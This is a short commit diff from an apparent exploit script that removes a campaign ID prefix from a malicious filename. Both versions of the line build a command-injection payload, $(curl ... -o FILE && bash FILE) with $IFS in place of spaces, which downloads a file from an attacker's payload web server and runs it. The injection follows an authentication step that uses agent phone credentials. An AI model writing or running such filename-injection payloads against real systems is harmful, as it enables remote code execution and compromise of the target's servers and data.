Remove campaign ID from the payload
This commit is contained in:
@@ -562,7 +562,7 @@ class Exploit:
|
||||
self.custom_print(f"Authenticated as agent using phone credentials", "+")
|
||||
|
||||
try:
|
||||
malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
|
||||
malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
|
||||
session_name = re.findall(
|
||||
r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
|
||||
)[0]
|
||||
|
||||
Reference in New Issue
Block a user